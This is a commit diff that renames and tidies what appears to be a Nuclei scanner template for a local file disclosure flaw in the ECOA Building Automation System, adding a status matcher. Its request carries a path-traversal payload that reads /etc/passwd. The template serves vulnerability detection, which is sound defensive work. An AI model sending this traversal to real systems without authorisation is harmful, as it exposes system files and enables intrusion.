Update and rename ecoa-building-automation-lfd.yaml to vulnerabilities/other/ecoa-building-automation-lfd.yaml

--- a/vulnerabilities/other/ecoa-building-automation-lfd.yaml
+++ b/vulnerabilities/other/ecoa-building-automation-lfd.yaml
@@ -1,9 +1,9 @@
 id: ecoa-building-automation-lfd
 info:
-  name: "ECOA Building Automation System Local File Disclosure"
+  name: ECOA Building Automation System - LFD
   author: 0x_Akoko
   severity: high
-  reference: "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php"
+  reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
   tags: ecoa,lfi
 
 requests:
@@ -14,7 +14,14 @@ requests:
 
         yr=2021&mh=6&fname=../../../../../../../../etc/passwd
 
+    matchers-condition: and
     matchers:
+
       - type: regex
         regex:
-          - "root:.*:0:0:"
+          - "root:.*:0:0"
+        condition: and
+
+      - type: status
+        status:
+          - 200
